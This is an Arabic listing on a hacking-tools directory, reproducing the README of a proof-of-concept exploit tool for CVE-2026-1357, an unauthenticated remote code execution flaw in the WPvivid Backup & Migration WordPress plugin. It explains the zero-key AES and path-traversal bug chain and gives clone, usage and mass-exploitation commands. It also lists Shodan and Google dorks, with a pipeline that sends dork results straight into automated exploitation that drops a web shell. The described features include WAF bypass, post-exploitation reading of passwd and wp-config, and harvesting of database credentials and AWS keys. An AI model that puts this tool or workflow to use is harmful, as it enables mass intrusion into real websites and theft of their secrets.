Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-1357-POC — أداة استغلال آلية لـ CVE-2026-1357، وهي ثغرة تنفيذ برمجيات عن بُعد (RCE) غير مصادق عليها في WPvivid Backup & Migration. تقوم بفحص أهداف WordPress، وتجاوز جدار الحماية (WAF/403)، ورفع شيل عبر اجتياز المسار (path traversal)، وتنفيذ استطلاع ما بعد الاستغلال مع توليد تقارير. | Kitploit
أدوات/GitHubGitHub/cybertechajju/cve-2026-1357-poc
الاستطلاعماسحات الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتما بعد الاستغلالتجاوز WAFاختبار الاختراق

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
cybertechajju/cve-2026-1357-poc

CVE-2026-1357-POC

أداة استغلال آلية لـ CVE-2026-1357، وهي ثغرة تنفيذ برمجيات عن بُعد (RCE) غير مصادق عليها في WPvivid Backup & Migration. تقوم بفحص أهداف WordPress، وتجاوز جدار الحماية (WAF/403)، ورفع شيل عبر اجتياز المسار (path traversal)، وتنفيذ استطلاع ما بعد الاستغلال مع توليد تقارير.

عرض المستودع
81منذ 6 أشهرلم تتم المراجعة بعد

CVE-2026-1357 — WPvivid Backup & Migration RCE

رصيد CVE: Lucas Montes (NiRoX)
الأداة بواسطة: CyberTechAjju
CVSS: 9.8 (حرج) | المتأثر: ≤ 0.9.123 | تم التصحيح: 0.9.124


⚠️ إخلاء مسؤولية

لأغراض الاختبار الأمني المصرح به فقط. الوصول غير المصرح به إلى الأنظمة غير قانوني.


نظرة عامة

ثغرة RCE غير مصادق عليها في WPvivid Backup & Migration عبر خطأين متسلسلين:

  1. فشل التشفير المفتوح — openssl_private_decrypt() يُرجع false عند وجود مفتاح خاطئ → phpseclib الإصدار 1 يتعامل معه كمفتاح AES صفري البايت → يشفّر المهاجم بـ 16 بايت صفرية
  2. اجتياز المسار — حقل name غير مُنقّى → ../uploads/shell.php يهرب من دليل النسخ الاحتياطي

القيد: قابلة للاستغلال فقط عندما يكون wpvivid_api_token مُولّدًا وغير منتهي الصلاحية.


الميزات


التثبيت

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-1357-poc.git
cd CVE-2026-1357-poc
pip install -r requirements.txt

الاستخدام

root@kitploit:~
# فحص فقط (كشف WordPress + WPvivid + الإصدار)
python3 cve_2026_1357.py -u http://target.com

# فحص + استغلال + ما بعد الاستغلال تلقائيًا
python3 cve_2026_1357.py -u http://target.com --exploit

# استغلال بدون استطلاع ما بعد الاستغلال
python3 cve_2026_1357.py -u http://target.com --exploit --no-post

# فحص جماعي مع تقرير
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

# عبر بروكسي Burp
python3 cve_2026_1357.py -u http://target.com --exploit --proxy http://127.0.0.1:8080

# وضع الحمولة فقط
python3 cve_2026_1357.py -u http://x --payload-only

جميع الخيارات

root@kitploit:~
-u, --url         عنوان URL الهدف الفردي
-l, --list        ملف يحتوي على عناوين URL (واحد لكل سطر)
--exploit         تفعيل وضع الاستغلال
--shell NAME      اسم ملف الشيل (الافتراضي: pwn_remote.php)
--no-post         تخطي استطلاع ما بعد الاستغلال
--report          توليد تقرير PoC بصيغة Markdown
--report-dir DIR  دليل إخراج التقرير
-t, --threads N   الخيوط المتزامنة (الافتراضي: 5)
--timeout SECS    مهلة الطلب (الافتراضي: 10)
--proxy URL       بروكسي HTTP لـ Burp
--payload-only    طباعة حمولة base64 والخروج
Screenshot_2026-02-14_00_18_14 Screenshot_2026-02-14_00_18_55

اكتشاف الأهداف (Dorks)

راجع dorks.md للقائمة الكاملة. أمثلة سريعة:

root@kitploit:~
# Shodan
http.html:"wpvivid-backuprestore"
http.html:"wpvivid" http.component:"WordPress"

# Google
inurl:"/wp-content/plugins/wpvivid-backuprestore/readme.txt"

# خط الأنابيب
shodan search 'http.html:"wpvivid-backuprestore"' --fields ip_str,port --limit 500 \
  | awk '{print "http://"$1":"$2}' > targets.txt
python3 cve_2026_1357.py -l targets.txt -t 20 --exploit --report

الملفات

root@kitploit:~
CVE-2026-1357-poc/
├── cve_2026_1357.py    ← الأداة الرئيسية (ماسح + مستغل + ما بعد الاستغلال)
├── dorks.md            ← Dorks لـ Shodan/Google/Censys/FOFA/ZoomEye
├── requirements.txt    ← تبعيات Python
├── .gitignore
└── README.md           ← هذا الملف

الاعتمادات

Lucas Montes (NiRoX) — اكتشاف CVE
CyberTechAjju — أدوات الاستغلال

تنزيل الأداة
الميزةالوصف
🔍 الكشف التلقائيبصمة WordPress + إضافة WPvivid + الإصدار
🛡️ تجاوز WAFتدوير User-Agent، تزوير الترويسات، حيل الترميز
🔓 تجاوز 403X-Forwarded-For، X-Original-URL، تطبيع المسار، الترميز المزدوج
💀 الاستغلال التلقائيحمولة AES بمفتاح صفري + رفع عبر اجتياز المسار
📋 ما بعد الاستغلالتشغيل تلقائي لأكثر من 20 أمر استطلاع (id، whoami، passwd، wp-config، SUID، إلخ.)
🔑 مستخرج البياناتيبحث عن بيانات قواعد البيانات، مفاتيح API، كلمات المرور، مفاتيح AWS من المخرجات
📊 توليد التقاريرتقرير PoC بصيغة Markdown مع أدلة استغلال كاملة
⚡ فحص جماعيمتعدد الخيوط مع دعم البروكسي/Burp